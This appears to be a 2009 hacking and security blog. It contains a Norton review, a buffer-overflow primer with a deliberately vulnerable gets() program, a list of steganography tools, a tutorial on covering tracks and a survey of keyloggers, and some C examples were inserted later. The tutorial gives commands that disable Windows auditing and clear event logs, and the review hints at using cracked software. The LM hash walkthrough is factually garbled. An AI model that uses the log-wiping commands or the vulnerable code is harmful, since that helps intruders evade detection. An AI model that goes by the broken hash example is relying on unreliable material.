
Thursday, April 30, 2009

Norton Antivirus 2009 – Norton Fails me..Again

Well..it all started with me picking up a Not For Sale copy of Norton Antivirus 2009 from an official source who wanted me to test and rate the antivirus - well..what can I say :X. Reluctant in the beginning (I had to take my Comodo firewall and Nod32 antivirus cover off my system to test this behemoth), I agreed for the sake of proving myself wrong, as my previous experience with it was terrible.

I was right..

Well, let's start with the basics: I installed it, activated it online and there you go..It eats up system memory and rules like a beast. Silent operation is pesky; however, you can control the notification settings from the configurable options. I intentionally inserted an infected pendrive with a rather assorted collection of viruses, worms and Trojans (some made with love from various virus development kits and Trojan makers like Turkojan and ProRat) and it was able to detect most of them; however, some hardened, binded executables were not detected by it.
It includes the facility of monitoring and scanning in real time but doesn't include anything special or distinctive from other antivirus products. Standard guard subsystems like mail scanning, file scanning, boot-time scanning and reporting are there, but they are also available in cheaper and free antivirus products like Avast too.
Norton has made a name for itself for its antivirus and I now wonder how? Perhaps there was a time when only they existed and people didn't really have any choice, but seriously, it's time to switch over.
The updates are heavy as it tries to connect to the central server and opens many ports in the process.
I did that after my system slowed down tremendously and I was pesked with its notifications; I tried to uninstall it, but here too it proved that I had to bite tougher nails. Uninstalling pesks you with options and tries to stop you like he is the boss and you are not. NAV and LiveUpdate features suffer from InstallShield errors sometimes, and sometimes a virus which has penetrated its defenses may corrupt a file or two, which will make it almost impossible (literally) to uninstall. Trust me, I'm not a skeptic critic of Norton, but they make me shudder every time I see NAV.
I was able to uninstall it after a few registry edits and some messing with Unlocker.

PROS -

  1. Total Protection (?) in a comprehensive suite

CONS-

  1. protection at the cost of resources
  2. heavy updates
  3. System hog
  4. resource eater
  5. file behemoth
  6. uninstallation is tougher
  7. It's NORTON
  8. costlier than others

Aftermath-
I reverted to the Nod32 and Comodo combo and my PC is almost as secure as Fort Knox :P and the best part is that they are the ones I shall recommend to you.

You can download it from here -

Download Norton Antivirus 2009 TRIAL

(TRIAL ? well try before you buy which you are not gonna do it after you try it :P else you know where to get cracks :) )

Keep learning..

POSTED BY XERO . ALL RIGHTS RESERVED.


Monday, April 27, 2009

Buffer overflows

  • A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

  • When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string.

    #include <stdio.h>

    /* Deliberately vulnerable example: gets() has no length bound, so any
     * input longer than the 31-byte name[] buffer is written past its end. */
    int main(void)
    {
        char name[31];
        printf("Please type your name: ");
        gets(name);
        printf("Hello, %s", name);
        return 0;
    }

Buffer overflow will occur if you enter:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity.

In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.

Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

Once a programmer has found a buffer overflow situation, it is necessary to create a buffer of hex characters that represent assembled code instructions. The programmer then creates a C program that executes the target program and overflows the buffer by inserting the hex code to be executed.


You may find details of a few known buffer overflow exploits at the URLs mentioned below:


Protection against Buffer Overflows
  • Buffer overflow vulnerabilities are inherent in code due to poor or no error checking.

  • General ways of protecting against buffer overflows:

    1. Close the port of service

    2. Apply the vendor's patch or install the latest version of the software

    3. Filter specific traffic at the firewall

    4. Test key application

    5. Run software at the least privilege required


General ways of protecting against buffer overflows include:

  1. Close the port of service: Keep track of vulnerability reports from sources like CERT and Bugtraq, and take preventive measures such as blocking the port in question.

  2. Apply the vendor's patch or install the latest version of the software: The next step should be to apply hotfixes or patches from a reliable source.

  3. Filter specific traffic at the firewall: All suspicious traffic should be filtered at the perimeter itself.

  4. Test key applications: Key applications should be tested for boundary conditions before being put into production.

  5. Run software at the least privilege required: No unnecessary privileges should be granted to users or applications. This is a best practice.
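As an added example (not part of the original post): the gets() program above rewritten with bounded reads, plus a helper that reports how many bytes a given input would spill past the 31-byte buffer, which is the kind of boundary-condition test item 4 asks for.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 31   /* same buffer size as the gets() example above */

/* How many bytes would spill past a buffer of buflen bytes if `input`
 * (plus the NUL terminator gets() appends) were written into it?
 * Returns 0 when the input fits. */
size_t overflow_bytes(size_t buflen, const char *input)
{
    size_t needed = strlen(input) + 1;
    return needed > buflen ? needed - buflen : 0;
}

/* Bounded replacement for an unchecked copy: writes at most dstsize-1 bytes
 * of src into dst, always NUL-terminates dst, and returns 1 if src had to
 * be truncated (0 otherwise). A return of 1 is the boundary condition the
 * application should test for rather than silently ignore. */
int copy_name_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    int truncated = 0;

    if (dstsize == 0)
        return 1;
    if (n >= dstsize) {
        n = dstsize - 1;
        truncated = 1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

/* Bounded line reader to use instead of gets(): fgets() stops after
 * dstsize-1 characters, so it cannot overrun dst. If the line was longer,
 * the remainder is drained so it does not leak into the next read, and 1
 * is returned so the caller knows the input was cut. */
int read_name_bounded(FILE *in, char *dst, size_t dstsize)
{
    int truncated = 0;
    size_t len;

    if (fgets(dst, (int)dstsize, in) == NULL) {
        dst[0] = '\0';
        return 0;
    }
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            truncated = 1;
    }
    return truncated;
}

/* Self-check helper: copies src into a NAME_LEN buffer with the bounded
 * copy and returns the stored string length (never more than NAME_LEN-1). */
size_t stored_name_length(const char *src)
{
    char name[NAME_LEN];
    copy_name_bounded(name, sizeof name, src);
    return strlen(name);
}

int main(void)
{
    char name[NAME_LEN];
    int cut;

    printf("Please type your name: ");
    cut = read_name_bounded(stdin, name, sizeof name);
    printf("Hello, %s%s\n", name, cut ? " (input was truncated)" : "");
    return 0;
}
```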

---Regards,
Amarjit Singh

What is Steganography?

  • The process of hiding data in images is called Steganography.

  • The most popular method for hiding data in files is to utilize graphic images as hiding place.

  • Attackers can embed information such as:

    1. Source code for hacking tool

    2. List of compromised servers

    3. Plans for future attacks

    4. your grandma's secret cookie recipe
What is Steganography? It has been described as the art and science of hiding information by embedding messages within other seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.
Given below is a list of a few steganography tools.

  • DiSi-Steganograph is a very small, DOS-based steganographic program that embeds data in PCX images.

  • EZStego is a Java based steganographic software which modifies the LSB of still pictures (supports only GIF and PICT formats) and rearranges the color palette.

  • Gif-It-Up v1.0 is a stego program for Windows 95 that hides data in GIF files. It replaces color indexes of the gif color table with indexes of 'color friends' (a color friend is a color in the same table and as close as possible).

  • Gifshuffle conceals a message in a GIF image by re-ordering the color map. Source code and a WIN32 executable are provided.

  • Hide and Seek is a stego program that hides any data into GIF images. It flips the LSB of pseudo-randomly chosen pixels. The data is first encrypted using the blowfish algorithm.

  • JPEG-JSTEG hides data inside a JPEG file. (Source code available)

  • MandelSteg and GIFExtract hide data in fractal GIF images. MandelSteg will create a Mandelbrot image (though it could be modified to produce other fractals), storing your data in the specified bit of the image pixels, after which GIFExtract can be used by the recipient to extract that bit-plane of the image. (Source code available)

  • MP3Stego hides data in popular MP3 sound files.

  • Nicetext transforms cipher-text into innocuous text which can be transformed back into the original cipher-text. The expandable set of tools allows experimentation with custom dictionaries, automatic simulation of writing style, and the use of Context-Free-Grammars to control text generation.

  • Pretty Good Envelope hides data in almost any file. In fact it embeds a binary message in a larger binary file by appending the message to the covert file as well as a 4-byte pointer to the start of the message. To retrieve the message, the last 4 bytes of the file are read, the file pointer is set to that value, and the file read from that point.

  • OutGuess is a steganographic tool for still images. It supports the PNM and JPEG image formats. OutGuess 'preserves statistics based on frequency counts. As a result, no known statistical test is able to detect the presence of steganographic content'.

  • SecurEngine hides files into 24 bit bitmap images (JPEG or BMP) or even text files. Files can be encrypted using GOST, Vernam or '3-way'.

  • Stealth is a simple filter for PGP 2.x which strips off all identifying header information. Only the encrypted data (which looks like random noise) remains; thus it is suitable for steganographic use.

  • Snow is used to conceal messages in ASCII text by appending white spaces to the end of lines.

  • Steganography Tools 4 encrypts the data with IDEA, MPJ2, DES, 3DES and NSEA in CBC, ECB, CFB, OFB and PCBC modes and hides it inside graphics (by modifying the LSB of BMP files), digital audio (WAV files) or unused sectors of HD floppies. The embedded message is usually very small.

  • Steganos is an easy to use wizard style program to hide and/or encrypt files. Steganos encrypts files and hides them within various different types of files. It also includes a text editor using the soft-tempest technology. Many other security features are included.

  • Steghide features hiding data in BMP, WAV and AU files, blowfish encryption, MD5 hashing of pass phrases to blowfish keys and pseudo-random distribution of hidden bits in the cover-data.

  • Stegodos is a set of DOS programs that encodes messages into GIF or PCX images. It works only with 320x200x256 pictures. The data embedded by modifying the LSB of the picture is noticeable in most cases.

  • Stegonosaurus is a UNIX program that will convert any binary file into nonsense text, but which statistically resembles text in the language of the dictionary supplied.

  • StegonoWav is a Java (JDK 1.0) program that hides information in 16-bit wav files using a spread spectrum technique.

  • wbStego lets you hide data in bitmaps, text files and also HTML files. The data is encrypted before embedding. Two different user interfaces are proposed: 'the wizard' guides the user step by step and the 'pro' mode gives him full control.
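As an added example, not code from any of the tools listed above: the LSB embedding that EZStego, Hide and Seek and Steghide build on, reduced to its core. Each 8-bit cover byte (a pixel or sample) carries one message bit in its least significant bit; a 32-bit length header tells the extractor where the payload ends. The encryption and pseudo-random bit placement those tools add are left out, and the cover "image" is a constructed gradient.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HEADER_BITS 32   /* 32-bit big-endian payload length precedes the data */

/* Payload bytes a cover of cover_len bytes can carry (one bit per byte). */
size_t lsb_capacity_bytes(size_t cover_len)
{
    return cover_len < HEADER_BITS ? 0 : (cover_len - HEADER_BITS) / 8;
}

/* Write one byte, MSB first, into the LSBs of 8 consecutive cover bytes. */
static void put_byte(uint8_t *cover, size_t *pos, uint8_t byte)
{
    for (int b = 7; b >= 0; b--, (*pos)++)
        cover[*pos] = (uint8_t)((cover[*pos] & 0xFEu) | ((byte >> b) & 1u));
}

/* Read one byte back from the LSBs of 8 consecutive cover bytes. */
static uint8_t get_byte(const uint8_t *cover, size_t *pos)
{
    uint8_t byte = 0;
    for (int b = 0; b < 8; b++, (*pos)++)
        byte = (uint8_t)((byte << 1) | (cover[*pos] & 1u));
    return byte;
}

/* Embed msg into cover in place. Returns the number of cover bytes
 * touched, or 0 if the cover is too small for header plus payload. */
size_t lsb_embed(uint8_t *cover, size_t cover_len, const uint8_t *msg, uint32_t msg_len)
{
    size_t pos = 0;
    if (msg_len > lsb_capacity_bytes(cover_len))
        return 0;
    for (int i = 3; i >= 0; i--)
        put_byte(cover, &pos, (uint8_t)(msg_len >> (8 * i)));
    for (uint32_t i = 0; i < msg_len; i++)
        put_byte(cover, &pos, msg[i]);
    return pos;
}

/* Extract a message embedded by lsb_embed. Returns the payload length, or
 * -1 if the header claims more data than the cover or `out` can hold. */
long lsb_extract(const uint8_t *cover, size_t cover_len, uint8_t *out, size_t out_cap)
{
    size_t pos = 0;
    uint32_t len = 0;
    if (cover_len < HEADER_BITS)
        return -1;
    for (int i = 0; i < 4; i++)
        len = (len << 8) | get_byte(cover, &pos);
    if (len > lsb_capacity_bytes(cover_len) || len > out_cap)
        return -1;
    for (uint32_t i = 0; i < len; i++)
        out[i] = get_byte(cover, &pos);
    return (long)len;
}

/* Self-check on a constructed 512-byte gradient cover: embeds text,
 * extracts it and returns how many cover bytes changed (each by exactly 1,
 * which is why the change is invisible but statistically detectable).
 * Returns -1 if the message did not fit or the round trip failed. */
long lsb_roundtrip(const char *text)
{
    enum { COVER_LEN = 512 };
    uint8_t original[COVER_LEN], cover[COVER_LEN], out[COVER_LEN];
    size_t n = strlen(text);
    long changed = 0;

    for (size_t i = 0; i < COVER_LEN; i++)          /* constructed pixels */
        original[i] = cover[i] = (uint8_t)(i * 7);
    if (lsb_embed(cover, COVER_LEN, (const uint8_t *)text, (uint32_t)n) == 0)
        return -1;
    if (lsb_extract(cover, COVER_LEN, out, sizeof out) != (long)n ||
        memcmp(out, text, n) != 0)
        return -1;
    for (size_t i = 0; i < COVER_LEN; i++)
        if (original[i] != cover[i])
            changed++;
    return changed;
}

int main(void)
{
    printf("cover bytes changed: %ld\n", lsb_roundtrip("grandma's cookie recipe"));
    return 0;
}
```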

Saturday, April 25, 2009

Protect your Pendrive and surfing using Democrakey

Hi friends.. what I'm going to discuss here might be of your interest, because almost every one of us is pesked nowadays with viruses in our pendrives/USB flash drives. Yep..this is the hard reality: you happily go to your friend's home to take those legally downloaded movies (*ahem), software and more stuff, and get back to your PC with your antivirus screaming "Caution!!! A virus has been detected".
Virus in the pendrive..the same sad story..
Well, it's my story from 2 weeks ago, when I was busy making a hacking challenge and had to deal with quite a lot of pendrives, and the viruses. So I googled and found DemocraKey. Imagine carrying a portable security suite with you wherever you go. Walk up to any computer, quickly scan it for viruses, and then defeat any internet access blocks to view any website you want anonymously. It's here, and the DemocraKey 2.0 Lite lets you have it on your iPod/pendrive/mp3 player. Yep..it's that small (just 50 MB in size) and packs some explosive applications for the stealthy geek.
DemocraKey is the brainchild of Kirk, who invented it in response to government snooping and censorship in China and the United States. DemocraKey converts your portable drive into a start-menu-like GUI-enabled mini drive which will track stats of how much space is left on your portable drive, and you can directly launch applications from the menu. DemocraKey features ClamWin as an antivirus suite, Mozilla Thunderbird as an email client and an enhanced version of Mozilla Firefox with the TOR proxy enabled, so that you can connect to any network or surf any site in the world, anywhere..anytime. The best part of it is that it's free and open source, backed by the GNU/GPL license. Based upon portable applications, you can enhance the DemocraKey experience by adding applications from portableapps.com.
In a nutshell, DemocraKey is your saviour when it comes to pendrive security and surfing the net anonymously.
Lemme sum up the features of DemocraKey -
  • Protect your computer from viruses with a security enhanced version of Firefox
  • Visit sites that are blocked by your school/employer/government
  • Hide your internet actions with Tor
  • Encrypt personal emails with GPG
  • Scan your computer with portable built in Antivirus software
  • Runs from any portable media - iPod, USB key, Digital Camera…
  • It’s FREE and Open Source!

You can download DemocraKey from -
Download from Sourceforge

I hope you like it :)


Friday, April 24, 2009

Google gets Powerpoint Powered and TIFF enabled

Google has been sprucing up its services (like it always does) and has added support for viewing PowerPoint files (.ppt) and TIFF files (compressed image files) to its services, enabled in Google Apps. A few months ago, it had added support for viewing PDF files in your browser; the same viewer now supports the TIFF and Microsoft PowerPoint document formats too. Now you can view TIFF and PPT files online, directly in your browser, without needing hefty software packages to start things up.
The default Google viewer had a "View as slideshow" option for PowerPoint files for a while; but now they have integrated the conversion technology into the same viewer that they used for PDFs and TIFFs. Powered up with a richer set of features, the new viewer enables you to zoom in and out, select text to copy and paste, and "print" the presentation to a PDF document. And, unlike the old version, you no longer require a Flash plugin installed in your browser.
Stay tuned for more Google innovations..
Keep Reading..

Thursday, April 23, 2009

Covering Tracks

  • Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.

  • When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

  • Erasing evidence of a compromise is a requirement for any attacker who would like to remain obscure. This usually starts with erasing the contaminated logins and any possible error messages that may have been generated from the attack process. For example, a buffer overflow attack will usually leave a message in the system logs. Next, the attention is turned to effecting changes so that future logins are not logged. A good way of ensuring that the system administrator continues to believe the output of his system is to manipulate the event logs and tweak the audit system.

    Because the first thing a system administrator does to monitor unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the system logs. In some extreme cases, rootkits can disable logging all together and discard all existing logs. This happens if the intruders intend to use the system for a longer time as a launch base for future intrusion activity. Then they will only remove those portions of logs that can reveal their presence.

    Disabling Auditing

    • First thing intruders will do after gaining Administrator privileges is to disable auditing.

    • NT Resource Kit's auditpol.exe tool can disable auditing using command line.

    • At the end of their stay, the intruders will just turn on auditing again using auditpol.exe

    One of the first steps for an attacker who has command-line capabilities is to determine the auditing status of the target system, locate sensitive files (such as password files), implant automatic information gathering tools (such as a Keyboard Logger or Network Sniffer).

    Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.

    auditpol.exe is a part of the NT resource kit and can be used as a simple command line utility to find out the audit status of the target system and also to make changes to it.

    The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

    C:\> auditpol \\ 

    This will reveal the current audit status of the system. He can choose to disable the auditing by:

    C:\> auditpol \\ /disable

    This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

    There is no effective technique to lock the auditing to prevent auditpol from disabling it. However, one can make it a scheduled event which will make the system check for the status of the auditing and then turns it on if it is disabled. Most host based IDS products will automatically re-enable auditing if it has been turned off.

    There are a number of reasons why auditing is important. These include:

    • Successful attacks are often preceded by a series of unsuccessful ones.

    • Detecting an attack in its early phase can contain damage.

    • Recovery often depends on realistic damage assessment.

    • Auditing and intrusion detection helps determine causal factors/people for the attack.

    • Assessing network compromise is dependent on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

    Clearing the Event log
    • Intruders can easily wipe out the logs in the event viewer

    • Event viewer on the attackers host can open, read and clear logs of the remote host.

    • This process will clear logs of all records but will leave one record stating that the event log has been cleared by 'Attacker'

    The event-logging service controls whether events are tracked on Windows 2000 systems. When this service is started, user actions and system resource usage events with the following event logs can be tracked:

    • Application Log Records events logged by applications.

    • Directory Service Records events logged by Active Directory and its related services.

    • DNS Server Records DNS queries, responses, and other DNS activities.

    • File Replication Service Records file replication activities on the system.

    • Security Log Records events set for auditing with local or global group policies.

    • System Log Records events logged by the operating system or its components, such as the failure of a service to start at bootup.

    In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared."

    Dump Event Log is a command-line tool, included in the Windows 2000 Server Resource Kit. It will dump an event log for a local or remote system into a tab separated text file. This file can then be imported into a spreadsheet or database for further investigation. The tool can also be used to filter for or filter out certain event types.

    The following syntax is used by the dumpel.exe tool:

    dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x] Where:

    -f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

    -s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

    -l log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

    -m source. Specifies in which source (such as redirector (rdr), serial, and so on) to dump records. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

    -e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

    -r. Specifies whether to filter for specific sources or records, or to filter them out.

    -t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

    -d x. Dumps events for the past x days.
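As an added example, not part of the original post and not the dumpel tool itself: a small scanner over a constructed dumpel-style dump (tab-separated; the column order date, time, type, category, event ID, source, user, computer, description is an assumption) that counts the event IDs the text says to check and flags the tell-tale sequence of repeated 529 failures followed by a 517 "Security Log Cleared" record.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample dump (the records are made up for this example).
 * Assumed columns: date, time, type (16 = failure audit, 8 = success audit),
 * category, event ID, source, user, computer, description. */
const char SAMPLE_DUMP[] =
"4/23/2009\t09:12:01\t16\t2\t529\tSecurity\tNT AUTHORITY\\SYSTEM\tSERV1\tLogon Failure: Unknown user name or bad password\n"
"4/23/2009\t09:12:09\t16\t2\t529\tSecurity\tNT AUTHORITY\\SYSTEM\tSERV1\tLogon Failure: Unknown user name or bad password\n"
"4/23/2009\t09:12:15\t16\t2\t529\tSecurity\tNT AUTHORITY\\SYSTEM\tSERV1\tLogon Failure: Unknown user name or bad password\n"
"4/23/2009\t09:12:22\t16\t2\t529\tSecurity\tNT AUTHORITY\\SYSTEM\tSERV1\tLogon Failure: Unknown user name or bad password\n"
"4/23/2009\t09:12:40\t8\t9\t680\tSecurity\tNT AUTHORITY\\SYSTEM\tSERV1\tAccount Used for Logon by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n"
"4/23/2009\t09:13:02\t8\t2\t528\tSecurity\tadministrator\tSERV1\tSuccessful Logon\n"
"4/23/2009\t09:20:44\t8\t1\t517\tSecurity\tadministrator\tSERV1\tThe audit log was cleared\n";

/* Event ID (5th tab-separated field) of one line, or -1 if the line has
 * too few fields. Never scans past the end of the line. */
static int event_id_of_line(const char *line)
{
    const char *p = line;
    for (int field = 0; field < 4; field++) {
        while (*p != '\0' && *p != '\t' && *p != '\n')
            p++;
        if (*p != '\t')
            return -1;
        p++;
    }
    return atoi(p);
}

/* Start of the next line, or the terminating NUL. */
static const char *next_line(const char *line)
{
    const char *nl = strchr(line, '\n');
    return nl ? nl + 1 : line + strlen(line);
}

/* Number of records carrying the given event ID. */
int count_event_id(const char *dump, int id)
{
    int n = 0;
    for (const char *line = dump; *line != '\0'; line = next_line(line))
        if (event_id_of_line(line) == id)
            n++;
    return n;
}

/* Flag the pattern an intruder leaves behind: at least `threshold` bad
 * password events (529) and, later, a "Security Log Cleared" (517).
 * Returns the number of 529 records seen before the first 517, or 0 if
 * there is no 517 or the threshold was not reached. */
int clear_after_failed_logons(const char *dump, int threshold)
{
    int failures = 0;
    for (const char *line = dump; *line != '\0'; line = next_line(line)) {
        int id = event_id_of_line(line);
        if (id == 529)
            failures++;
        else if (id == 517)
            return failures >= threshold ? failures : 0;
    }
    return 0;
}

int main(void)
{
    printf("529 (bad password):   %d\n", count_event_id(SAMPLE_DUMP, 529));
    printf("680 (account logon):  %d\n", count_event_id(SAMPLE_DUMP, 680));
    printf("517 (log cleared):    %d\n", count_event_id(SAMPLE_DUMP, 517));
    printf("failures before clear: %d\n", clear_after_failed_logons(SAMPLE_DUMP, 3));
    return 0;
}
```

A 517 record is the one event WinZapper-style selective deletion cannot hide and bulk clearing always leaves, so alerting on it (and on the failure burst before it) is cheap and reliable.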


    An attacker would be interested in clearing the event log after the audit has been disabled using auditpol.exe. One tool that will be of interest is elsave.exe. Written by Jesper Lauritsen, this tool helps clear the NT event log.

    ELSave takes the following arguments:

    -s \\server

    Server for which you want to save or clear the log.

    -F file

    Save the log to a file with this name. Must be an absolute path to a local file on the server specified with -s. If -F is not specified the log is not saved.

    -l log

    Name of log to save or clear. Must be one of system, application or security. Default is application.

    -q

    Write errors and warnings to the application event log. Default is to write errors to stderr. This option is mostly useful when ELSave is run in the background, like for example from the scheduler.

    -C

    Clears the log. If -C is not specified the log is not cleared.

    Example:

    Save the application log on \\serv1 to \\serv1\d$\application.log:

    elsave -s \\serv1 -F d:\application.log

    Save the system log on the local machine to d:\system.log and then clear the log:

    elsave -l system -F d:\system.log -C

    Hacking Tool: WinZapper
    • WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

    • To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear.

    • To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!

    It is considered that event logs are generally not compromised without shutting the service down by legitimate means or otherwise. WinZapper is a tool that is capable of breaking into the event logging system without shutting it off or crashing the service.

    Evidence Eliminator
    • Evidence Eliminator is an easy to use powerful and flexible data cleansing system for Windows PC.

    • Daily use protects you from unwanted data becoming permanently hidden in your PC.

    • It cleans recycle bins, Internet cache, system files, temp folders etc.

    Evidence Eliminator is a windows based product that is known for countering privacy invasion and giving the user the ability to remove evidence of his activities on a system - such as websites visited, cookies stored, documents read etc.

    Hiding Files
    • There are two ways of hiding files in NT/2000.

      1. Attrib

        • use attrib +h [file/directory]

      2. NTFS Alternate Data Streaming

        • The NTFS file system used by Windows NT, 2000 and XP has a feature called Alternate Data Streams, which allows data to be stored in hidden streams that are linked to a normal, visible file.

        Streams are not limited in size, and there can be more than one stream linked to a normal file.

    Every file consists of a set of attributes. However, a file's name is not part of the file. The filename is a directory entry that points to the actual file. This level of indirection is necessary because Windows 2000 and Windows NT both support links. The directory entry can be considered to be analogous to a pointer - the unique filename and directory entry tells the file system which file to access. It is possible to have more than one pointer that points to the same data.

    ---Regards,
    Amarjit Singh

    Keystroke Loggers: KEYLOGGERS

    • If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution.

    • Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

    • There are two types of keystroke loggers:

      1. Software based and

      2. Hardware based.

    Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed using the keyboard and making it available to another person / agency probing the user. This may be conveyed over e-mail or a Web site or even saved on the same system as a hidden file.

    Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

    Hardware keystroke loggers are hardware devices that attach physically to the keyboard and record data. These devices generally look like a standard keyboard adapter, so they remain camouflaged unless specifically looked for. In order to retrieve data from a hardware logger, the person who is doing the probing must regain physical access to that piece of equipment. Hardware loggers work by storing information in the actual device, and generally do not have the ability to broadcast or send such information out over a network. One primary advantage hardware keystroke loggers carry is that they will not be discovered by any of the anti-spyware, anti-virus or desktop security programs.

    Software keystroke loggers are more widely used as they can be installed remotely via the network, as part of virus / Trojan software etc. Physical access is not required on part of the person probing to obtain keystroke data (as data is emailed out from the machine periodically). Software loggers often have the ability to obtain much more data as well, as they are not limited by physical memory allocations in the same way as hardware keystroke loggers are. Magic Lantern - developed as part of the FBI's Carnivore project - is a Trojan/key-logger specifically aimed at gathering encryption key information for transmission back to the FBI.


    Spyware: Spector (www.spector.com)
    • Spector is spyware; it will record everything anyone does on the internet.

    • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

    • Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.


    Hacking Tool: eBlaster (www.spector.com)
    • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

    • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed, and then automatically sends this recorded information to your own email address.

    • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

    IKS Software Keylogger

    IKS - Invisible Keylogger is a desktop activity logger that is powered by a kernel mode driver. This driver enables it to run silently at the lowest level of windows 2000/XP operating systems. IKS is extremely difficult to detect, primarily because of its stealth surveillance methods. The only evidence of IKS is the growing binary keystroke log file with the input of keystrokes. All keystrokes are recorded, including the path alt-ctrl-del and keystrokes in a DOS box or Java chat room.

    In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable. For manual setup, an attacker needs to copy just one program file to the target computer and add two lines to the system.ini file. He can then rename the log file, or even rename the program. Therefore, even an exhaustive hard drive search will find that the program exists.

    IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

    Hacking Tool: Hardware Key Logger (www.keyghost.com)
    • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

    • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

    The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

    Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

    Recorded keystrokes can be played back into any text editor using proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders, KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.


    What is LanManager Hash?

    Example: Let's say your password is '123456qwerty'.

    • When this password is hashed with the LM algorithm, it is first converted to all uppercase: '123456QWERTY'

    • The password is padded with null (blank) characters to make it 14 characters long: '123456QWERTY_'

    • Before encryption, the 14 character string is split in half: '123456Q' and 'WERTY_'

    • Each half is individually encrypted and the results concatenated:

      '123456Q' = 6BF11E04AFAB197F
      'WERTY_'  = F1E9FFDCC75575B15

    • The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

    The first half of the hash contains alpha-numeric characters and takes about 24 hours to crack with L0phtCrack; the second half takes only 60 seconds.

    All Windows clients including Windows 2000, Windows Server 2003, and Windows XP are configured by default to send LM and NTLM authentication responses, except Win9x clients, which only send LM. The default setting on servers allows all clients to authenticate with servers and use their resources. However, this default setting allows for LM responses (the weakest form of authentication response) to be sent over the network. This makes it attractive to attackers who can sniff the traffic and crack passwords with relatively less effort.

